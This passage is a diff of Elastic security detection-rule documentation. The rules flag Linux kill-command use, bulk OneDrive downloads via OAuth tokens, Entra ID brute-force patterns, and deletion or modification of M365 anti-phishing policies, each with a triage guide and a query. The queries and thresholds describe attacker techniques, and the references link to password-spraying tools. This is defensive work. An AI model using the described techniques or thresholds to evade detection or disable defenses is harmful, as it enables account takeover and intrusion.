5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Kill Command Execution* + +In Linux environments, commands like kill, pkill, and killall are essential for managing processes, allowing users to terminate them as needed. However, adversaries can exploit these commands to disable security tools or disrupt operations, aiding in evasion tactics. The detection rule identifies such misuse by monitoring process execution events, specifically targeting these commands to flag potential threats. + + +*Possible investigation steps* + + +- Review the process execution event details to identify the user account associated with the kill, pkill, or killall command execution. This can help determine if the action was performed by a legitimate user or a potential adversary. +- Examine the parent process of the command execution to understand the context in which the kill command was initiated. This can provide insights into whether the command was part of a script or an interactive session. +- Check the target process IDs (PIDs) that were terminated by the kill command to assess if critical or security-related processes were affected, which might indicate malicious intent. +- Investigate the timing and frequency of the command execution to identify patterns or anomalies, such as repeated or scheduled executions, which could suggest automated or scripted activity. +- Correlate the event with other security alerts or logs from the same host around the same timeframe to identify any related suspicious activities or indicators of compromise. + + +*False positive analysis* + + +- Routine system maintenance tasks may trigger the rule when administrators use kill commands to manage processes. To handle this, create exceptions for known maintenance scripts or processes by identifying their unique attributes, such as user or command line arguments. +- Automated scripts or monitoring tools that use kill commands for legitimate purposes, like restarting services, can cause false positives. Exclude these by specifying the script names or paths in the detection rule. +- Development environments where developers frequently use kill commands during testing can lead to alerts. Consider excluding processes executed by specific user accounts associated with development activities. +- System updates or package management tools might use kill commands as part of their operation. Identify these processes and exclude them based on their parent process or command line patterns. +- Backup or recovery operations that involve stopping services may trigger the rule. Exclude these by recognizing the specific backup software or service names involved. + + +*Response and remediation* + + +- Immediately isolate the affected Linux system from the network to prevent further malicious activity or lateral movement by the attacker. +- Identify and terminate any unauthorized or suspicious processes that were started around the time of the alert, focusing on those that may have been targeted by the kill, pkill, or killall commands. +- Review system logs and process execution history to determine the origin of the kill command execution and assess whether it was initiated by a legitimate user or a compromised account. +- Restore any terminated security tools or critical processes to ensure the system's defenses are fully operational. +- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection tools to identify and remove any additional malware or persistence mechanisms. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if other systems may be affected. +- Implement additional monitoring and alerting for similar command executions across the network to enhance detection and response capabilities for future incidents. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and event.action:exec and +process.name:(kill or pkill or killall) and not ( + process.args:("-HUP" or "-SIGUSR1" or "-USR2" or "-WINCH" or "-USR1") or + process.parent.command_line:"runc init" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: Hidden Files and Directories +** ID: T1564.001 +** Reference URL: https://attack.mitre.org/techniques/T1564/001/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Indicator Blocking +** ID: T1562.006 +** Reference URL: https://attack.mitre.org/techniques/T1562/006/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc new file mode 100644 index 0000000000..7f70f207e8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc @@ -0,0 +1,142 @@ +[[prebuilt-rule-8-19-8-m365-onedrive-excessive-file-downloads-with-oauth-token]] +=== M365 OneDrive Excessive File Downloads with OAuth Token + +Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/ + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Data Source: Microsoft 365 +* Data Source: SharePoint +* Data Source: OneDrive +* Use Case: Threat Detection +* Tactic: Collection +* Tactic: Exfiltration +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating M365 OneDrive Excessive File Downloads with OAuth Token* + + +This rule detects an excessive number of files downloaded from OneDrive using OAuth authentication. Threat actors may use OAuth phishing attacks, such as **Device Code Authentication phishing**, to obtain valid access tokens and perform unauthorized data exfiltration. This method allows adversaries to bypass traditional authentication mechanisms, making it a stealthy and effective technique. + +This rule leverages ESQL aggregations which limit the field values available in the alert document. To investigate further, it is recommended to identify the original documents ingested. + + +*Possible Investigation Steps* + + +- Review the `o365.audit.UserId` field to identify the user who performed the downloads. Check if this user typically downloads large amounts of data from OneDrive. +- Correlate `o365.audit.UserId` with Entra Sign-In logs to verify the authentication method used and determine if it was expected for this user. +- Review the authentication method used. If OAuth authentication was used, investigate whether it was expected for this user. +- Identify the client application used for authentication. Determine if it is a legitimate enterprise-approved app or an unauthorized third-party application. +- Check the number of unique files downloaded. If a user downloads a high volume of unique files in a short period, it may indicate data exfiltration. +- Analyze the file types and directories accessed to determine if sensitive or confidential data was involved. +- Investigate the source IP address and geolocation of the download activity. If it originates from an unusual or anonymized location, further scrutiny is needed. +- Review other recent activities from the same user, such as file access, sharing, or permission changes, that may indicate further compromise. +- Check for signs of session persistence using OAuth. If Azure sign-in logs are correlated where `authentication_protocol` or `originalTransferMethod` field shows `deviceCode`, the session was established through device code authentication. +- Look for multiple authentication attempts from different devices or locations within a short timeframe, which could indicate unauthorized access. +- Investigate if other OAuth-related anomalies exist, such as consent grants for unfamiliar applications or unexpected refresh token activity. +- Review the `file.directory` value from the original documents to identify the specific folders or paths where the files were downloaded. + + +*False Positive Analysis* + + +- Verify if the user regularly downloads large batches of files as part of their job function. +- Determine if the downloads were triggered by an authorized automated process, such as a data backup or synchronization tool. +- Confirm if the detected OAuth application is approved for enterprise use and aligns with expected usage patterns. + + +*Response and Remediation* + + +- If unauthorized activity is confirmed, revoke the OAuth token used and terminate active OneDrive sessions. +- Reset the affected user's password and require reauthentication to prevent continued unauthorized access. +- Restrict OAuth app permissions and enforce conditional access policies to limit authentication to trusted devices and applications. +- Monitor for additional signs of compromise, such as unusual email forwarding rules, external sharing of OneDrive files, or privilege escalation attempts. +- Educate users on OAuth phishing risks and encourage the use of **Microsoft Defender for Office 365 Safe Links** to mitigate credential-based attacks. +- Enable continuous monitoring for OAuth authentication anomalies using **Microsoft Entra ID sign-in logs** and security tools. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-o365.audit-* +| where + @timestamp > now() - 14d and + event.dataset == "o365.audit" and + event.provider == "OneDrive" and + event.action == "FileDownloaded" and + o365.audit.AuthenticationType == "OAuth" and + event.outcome == "success" +| eval + Esql.time_window_date_trunc = date_trunc(1 minutes, @timestamp) +| keep + Esql.time_window_date_trunc, + o365.audit.UserId, + file.name, + source.ip +| stats + Esql.file_name_count_distinct = count_distinct(file.name), + Esql.event_count = count(*) + by + Esql.time_window_date_trunc, + o365.audit.UserId, + source.ip +| where + Esql.file_name_count_distinct >= 25 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc new file mode 100644 index 0000000000..0ca1e2afdb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc @@ -0,0 +1,275 @@ +[[prebuilt-rule-8-19-8-microsoft-365-brute-force-via-entra-id-sign-ins]] +=== Microsoft 365 Brute Force via Entra ID Sign-Ins + +Identifies potential brute-force attacks targeting Microsoft 365 user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to Microsoft 365 services such as Exchange Online, SharePoint, or Teams. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 15m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying +* https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray +* https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties +* https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/ +* https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes +* https://github.com/0xZDH/Omnispray +* https://github.com/0xZDH/o365spray + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft 365 Brute Force via Entra ID Sign-Ins* + + +Identifies brute-force authentication activity against Microsoft 365 services using Entra ID sign-in logs. This detection groups and classifies failed sign-in attempts based on behavior indicative of password spraying, credential stuffing, or password guessing. The classification (`bf_type`) is included for immediate triage. + + +*Possible investigation steps* + + +- Review `bf_type`: Classifies the brute-force behavior (`password_spraying`, `credential_stuffing`, `password_guessing`). +- Examine `user_id_list`: Review the identities targeted. Are they admins, service accounts, or external identities? +- Review `login_errors`: Multiple identical errors (e.g., `"Invalid grant..."`) suggest automated abuse or tooling. +- Check `ip_list` and `source_orgs`: Determine if requests came from known VPNs, hosting providers, or anonymized infrastructure. +- Validate `unique_ips` and `countries`: Multiple countries or IPs in a short window may indicate credential stuffing or distributed spray attempts. +- Compare `total_attempts` vs `duration_seconds`: High volume over a short duration supports non-human interaction. +- Inspect `user_agent.original` via `device_detail_browser`: Clients like `Python Requests` or `curl` are highly suspicious. +- Investigate `client_app_display_name` and `incoming_token_type`: Identify non-browser-based logins, token abuse or commonly mimicked clients like VSCode. +- Review `target_resource_display_name`: Confirm the service being targeted (e.g., SharePoint, Exchange). This may be what authorization is being attempted against. +- Pivot using `session_id` and `device_detail_device_id`: Determine if a single device is spraying multiple accounts. +- Check `conditional_access_status`: If "notApplied", determine whether conditional access is properly scoped. +- Correlate `user_principal_name` with successful sign-ins: Investigate surrounding logs for lateral movement or privilege abuse. + + +*False positive analysis* + + +- Developer automation (e.g., CI/CD logins) or mobile sync errors may create noisy but benign login failures. +- Red team exercises or pentesting can resemble brute-force patterns. +- Legacy protocols or misconfigured service principals may trigger repeated login failures from the same IP or session. + + +*Response and remediation* + + +- Notify identity or security operations teams to investigate further. +- Lock or reset affected user accounts if compromise is suspected. +- Block the source IP(s) or ASN temporarily using conditional access or firewall rules. +- Review tenant-wide MFA and conditional access enforcement. +- Audit targeted accounts for password reuse across systems or tenants. +- Enable lockout or throttling policies for repeated failed login attempts. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.signinlogs-* + +| eval + Esql.time_window_date_trunc = date_trunc(15 minutes, @timestamp), + Esql_priv.azure_signinlogs_properties_user_principal_name_lower = to_lower(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_properties_incoming_token_type_lower = to_lower(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_app_display_name_lower = to_lower(azure.signinlogs.properties.app_display_name), + Esql.user_agent_original = user_agent.original + +| where event.dataset == "azure.signinlogs" + and event.category == "authentication" + and azure.signinlogs.category in ("NonInteractiveUserSignInLogs", "SignInLogs") + and azure.signinlogs.properties.resource_display_name rlike "(.*)365|SharePoint|Exchange|Teams|Office(.*)" + and event.outcome == "failure" + and azure.signinlogs.properties.status.error_code != 50053 + and azure.signinlogs.properties.status.error_code in ( + 50034, // UserAccountNotFound + 50126, // InvalidUsernameOrPassword + 50055, // PasswordExpired + 50056, // InvalidPassword + 50057, // UserDisabled + 50064, // CredentialValidationFailure + 50076, // MFARequiredButNotPassed + 50079, // MFARegistrationRequired + 50105, // EntitlementGrantsNotFound + 70000, // InvalidGrant + 70008, // ExpiredOrRevokedRefreshToken + 70043, // BadTokenDueToSignInFrequency + 80002, // OnPremisePasswordValidatorRequestTimedOut + 80005, // OnPremisePasswordValidatorUnpredictableWebException + 50144, // InvalidPasswordExpiredOnPremPassword + 50135, // PasswordChangeCompromisedPassword + 50142, // PasswordChangeRequiredConditionalAccess + 120000, // PasswordChangeIncorrectCurrentPassword + 120002, // PasswordChangeInvalidNewPasswordWeak + 120020 // PasswordChangeFailure + ) + and azure.signinlogs.properties.user_principal_name is not null + and azure.signinlogs.properties.user_principal_name != "" + and user_agent.original != "Mozilla/5.0 (compatible; MSAL 1.0) PKeyAuth/1.0" + +| stats + Esql.azure_signinlogs_properties_authentication_requirement_values = values(azure.signinlogs.properties.authentication_requirement), + Esql.azure_signinlogs_properties_app_id_values = values(azure.signinlogs.properties.app_id), + Esql.azure_signinlogs_properties_app_display_name_values = values(azure.signinlogs.properties.app_display_name), + Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id), + Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name), + Esql.azure_signinlogs_properties_conditional_access_status_values = values(azure.signinlogs.properties.conditional_access_status), + Esql.azure_signinlogs_properties_device_detail_browser_values = values(azure.signinlogs.properties.device_detail.browser), + Esql.azure_signinlogs_properties_device_detail_device_id_values = values(azure.signinlogs.properties.device_detail.device_id), + Esql.azure_signinlogs_properties_device_detail_operating_system_values = values(azure.signinlogs.properties.device_detail.operating_system), + Esql.azure_signinlogs_properties_incoming_token_type_values = values(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_risk_state_values = values(azure.signinlogs.properties.risk_state), + Esql.azure_signinlogs_properties_session_id_values = values(azure.signinlogs.properties.session_id), + Esql.azure_signinlogs_properties_user_id_values = values(azure.signinlogs.properties.user_id), + Esql_priv.azure_signinlogs_properties_user_principal_name_values = values(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_result_description_values = values(azure.signinlogs.result_description), + Esql.azure_signinlogs_result_signature_values = values(azure.signinlogs.result_signature), + Esql.azure_signinlogs_result_type_values = values(azure.signinlogs.result_type), + + Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct = count_distinct(Esql_priv.azure_signinlogs_properties_user_principal_name_lower), + Esql_priv.azure_signinlogs_properties_user_principal_name_lower_values = values(Esql_priv.azure_signinlogs_properties_user_principal_name_lower), + Esql.azure_signinlogs_result_description_count_distinct = count_distinct(azure.signinlogs.result_description), + Esql.azure_signinlogs_result_description_values = values(azure.signinlogs.result_description), + Esql.azure_signinlogs_properties_status_error_code_count_distinct = count_distinct(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_status_error_code_values = values(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_incoming_token_type_lower_values = values(Esql.azure_signinlogs_properties_incoming_token_type_lower), + Esql.azure_signinlogs_properties_app_display_name_lower_values = values(Esql.azure_signinlogs_properties_app_display_name_lower), + Esql.source_ip_values = values(source.ip), + Esql.source_ip_count_distinct = count_distinct(source.ip), + Esql.source_as_organization_name_values = values(source.`as`.organization.name), + Esql.source_as_organization_name_count_distinct = count_distinct(source.`as`.organization.name), + Esql.source_geo_country_name_values = values(source.geo.country_name), + Esql.source_geo_country_name_count_distinct = count_distinct(source.geo.country_name), + Esql.@timestamp.min = min(@timestamp), + Esql.@timestamp.max = max(@timestamp), + Esql.event_count = count() +by Esql.time_window_date_trunc + +| eval + Esql.event_duration_seconds = date_diff("seconds", Esql.@timestamp.min, Esql.@timestamp.max), + Esql.event_bf_type = case( + Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct >= 10 + and Esql.event_count >= 30 + and Esql.azure_signinlogs_result_description_count_distinct <= 3 + and Esql.source_ip_count_distinct >= 5 + and Esql.event_duration_seconds <= 600 + and Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct > Esql.source_ip_count_distinct, + "credential_stuffing", + + Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct >= 15 + and Esql.azure_signinlogs_result_description_count_distinct == 1 + and Esql.event_count >= 15 + and Esql.event_duration_seconds <= 1800, + "password_spraying", + + (Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct == 1 + and Esql.azure_signinlogs_result_description_count_distinct == 1 + and Esql.event_count >= 30 + and Esql.event_duration_seconds <= 300) + or (Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct <= 3 + and Esql.source_ip_count_distinct > 30 + and Esql.event_count >= 100), + "password_guessing", + + "other" + ) + +| where Esql.event_bf_type != "other" + +| keep + Esql.time_window_date_trunc, + Esql.event_bf_type, + Esql.event_duration_seconds, + Esql.event_count, + Esql.@timestamp.min, + Esql.@timestamp.max, + Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct, + Esql_priv.azure_signinlogs_properties_user_principal_name_lower_values, + Esql.azure_signinlogs_result_description_count_distinct, + Esql.azure_signinlogs_result_description_values, + Esql.azure_signinlogs_properties_status_error_code_count_distinct, + Esql.azure_signinlogs_properties_status_error_code_values, + Esql.azure_signinlogs_properties_incoming_token_type_lower_values, + Esql.azure_signinlogs_properties_app_display_name_lower_values, + Esql.source_ip_values, + Esql.source_ip_count_distinct, + Esql.source_as_organization_name_values, + Esql.source_as_organization_name_count_distinct, + Esql.source_geo_country_name_values, + Esql.source_geo_country_name_count_distinct, + Esql.azure_signinlogs_properties_authentication_requirement_values, + Esql.azure_signinlogs_properties_app_id_values, + Esql.azure_signinlogs_properties_app_display_name_values, + Esql.azure_signinlogs_properties_resource_id_values, + Esql.azure_signinlogs_properties_resource_display_name_values, + Esql.azure_signinlogs_properties_conditional_access_status_values, + Esql.azure_signinlogs_properties_device_detail_browser_values, + Esql.azure_signinlogs_properties_device_detail_device_id_values, + Esql.azure_signinlogs_properties_device_detail_operating_system_values, + Esql.azure_signinlogs_properties_incoming_token_type_values, + Esql.azure_signinlogs_properties_risk_state_values, + Esql.azure_signinlogs_properties_session_id_values, + Esql.azure_signinlogs_properties_user_id_values + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-policy-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-policy-deletion.asciidoc new file mode 100644 index 0000000000..6bc3a468b3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-policy-deletion.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-policy-deletion]] +=== Microsoft 365 Exchange Anti-Phish Policy Deletion + +Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishpolicy?view=exchange-ps +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Anti-Phish Policy Deletion* + + +Microsoft 365's anti-phishing policies enhance security by fine-tuning detection settings to thwart phishing attacks. Adversaries may delete these policies to weaken defenses, facilitating unauthorized access. The detection rule monitors audit logs for successful deletions of anti-phishing policies, signaling potential malicious activity by identifying specific actions and outcomes associated with policy removal. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.action "Remove-AntiPhishPolicy" to identify the user account responsible for the deletion. +- Check the event.outcome field to confirm the success of the policy deletion and gather additional context from related logs around the same timestamp. +- Investigate the user account's recent activities in Microsoft 365 to identify any other suspicious actions or anomalies, such as unusual login locations or times. +- Assess whether the user account has been compromised by checking for any unauthorized access attempts or changes in account settings. +- Evaluate the impact of the deleted anti-phishing policy by reviewing the organization's current phishing protection measures and any recent phishing incidents. +- Coordinate with the IT security team to determine if the policy deletion was authorized or part of a legitimate change management process. + + +*False positive analysis* + + +- Routine administrative actions may trigger the rule if IT staff regularly update or remove outdated anti-phishing policies. To manage this, create exceptions for known administrative accounts performing these actions. +- Scheduled policy reviews might involve the removal of policies as part of a legitimate update process. Document these schedules and exclude them from triggering alerts by setting time-based exceptions. +- Automated scripts used for policy management can inadvertently cause false positives. Identify and whitelist these scripts to prevent unnecessary alerts. +- Changes in organizational policy that require the removal of certain anti-phishing policies can be mistaken for malicious activity. Ensure that such changes are communicated and logged, and adjust the rule to recognize these legitimate actions. +- Test environments where policies are frequently added and removed for validation purposes can generate false positives. Exclude these environments from the rule to avoid confusion. + + +*Response and remediation* + + +- Immediately isolate the affected user accounts and systems to prevent further unauthorized access or data exfiltration. +- Recreate the deleted anti-phishing policy using the latest security guidelines and ensure it is applied across all relevant user groups. +- Conduct a thorough review of recent email activity and logs for the affected accounts to identify any phishing emails that may have bypassed security measures. +- Reset passwords for affected accounts and enforce multi-factor authentication (MFA) to enhance account security. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Escalate the incident to the incident response team if there is evidence of broader compromise or if sensitive data has been accessed. +- Implement enhanced monitoring and alerting for similar actions in the future to quickly detect and respond to any further attempts to delete security policies. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"Remove-AntiPhishPolicy" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-rule-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-rule-modification.asciidoc new file mode 100644 index 0000000000..2c7e9cbc18 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-rule-modification.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-rule-modification]] +=== Microsoft 365 Exchange Anti-Phish Rule Modification + +Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishrule?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/disable-antiphishrule?view=exchange-ps + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Anti-Phish Rule Modification* + + +Microsoft 365's anti-phishing rules are crucial for safeguarding users against phishing attacks by enhancing detection and prevention settings. Adversaries may attempt to modify or disable these rules to facilitate phishing campaigns, gaining unauthorized access. The detection rule monitors for successful modifications or disabling of anti-phishing rules, signaling potential malicious activity by tracking specific actions within the Exchange environment. + + +*Possible investigation steps* + + +- Review the event logs for entries with event.dataset set to o365.audit and event.provider set to Exchange to confirm the context of the alert. +- Check the event.action field for "Remove-AntiPhishRule" or "Disable-AntiPhishRule" to identify the specific action taken on the anti-phishing rule. +- Verify the event.outcome field to ensure the action was successful, indicating a potential security concern. +- Identify the user or account associated with the modification by examining the relevant user fields in the event log. +- Investigate the user's recent activity and access patterns to determine if there are any other suspicious actions or anomalies. +- Assess the impact of the rule modification by reviewing any subsequent phishing attempts or security incidents that may have occurred. +- Consider reverting the changes to the anti-phishing rule and implementing additional security measures if 